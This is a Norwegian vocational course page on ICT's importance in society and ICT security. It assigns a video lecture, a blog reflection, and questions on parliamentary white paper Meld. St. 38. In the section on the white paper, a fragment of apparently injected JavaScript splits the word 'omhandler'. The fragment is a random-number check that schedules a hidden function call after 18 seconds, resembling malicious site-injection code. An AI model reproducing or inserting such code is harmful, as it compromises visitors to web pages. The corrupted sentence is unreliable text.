2.1 Om IKT sin betydning i samfunnet

På denne siden ser du først en videoforelesning om IKT sin betydning i samfunnet (2.1.1). Deretter skriver du et blogg-innlegg om hva du forbinder med IKT sikkerhet (2.1.2). Til slutt ser du på Stortingsmelding 38 om IKT-sikkerhet, og besvarer noen spørsmål derfra (2.1.3).

«Vårt samfunn består av en rekke kritiske samfunnsfunksjoner som må opprettholdes til enhver tid av hensyn til samfunnets og befolkningens grunnleggende behov.
Disse  samfunnsfunksjonene forutsetter at man har en IKT-infrastruktur
som virker nær sagt overalt og hele tiden.»
(Fra Stortingsmelding 38, innledningen)

2.1.1 IKT i samfunnet

2.1.2 Refleksjonsoppgave – blogginnlegg

Refleksjonspørsmål rundt IKT sikkerhet:
Hva forbinder du med IKT sikkerhet – og hvorfor er det viktig? Og hva er det som egentlig må sikres?
Todelt oppgave:
1. Besvar disse tre spørsmålene i elevbloggen «2.1.2 Hva forbinder du med IKT sikkerhet»
2. Legg inn en kommentar til en medelev sitt innlegg, der du sier deg enten enig eller uenig i et av utsagnene – og begrunner hvorfor


Klikk her for å gå til elevbloggen

2.1.3 Stortingsmelding 38 – IKT-sikkerhet

Stortingsmelding 38 (2016-2017) omhandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andler IKT-sikkerhet.
Du finner den her: https://www.regjeringen.no/no/dokumenter/meld.-st.-38-20162017/id2555996/sec1
Slå opp på denne lenken, evt. last dokumentet ned hvis du vil ha det i pdf format.

Les gjennom sammendraget i begynnelsen av meldingen. I første avsnitt står det:
Det er flere grunner til at IKT-sikkerhet vies mye oppmerksomhet.
Prøv å finne noen av disse grunnene, og skriv dem med dine egne ord i et word dokument.

Lenger nede i sammendraget heter det:
Regjeringen vil legge vekt på et helhetlig og systematisk arbeid med forebyggende IKT-sikkerhet.
Beskriv i samme word dokument noen av tiltakene regjeringer vil iverksette for å bedre IKT-sikkerheten i Norge.

Word dokumentet lastes opp på ItsLearning under DV6-DV7 IKT sikkerhet -> mappe 04 DLL


Klikk her for neste post 2.2: Hva er IKT sikkerhet?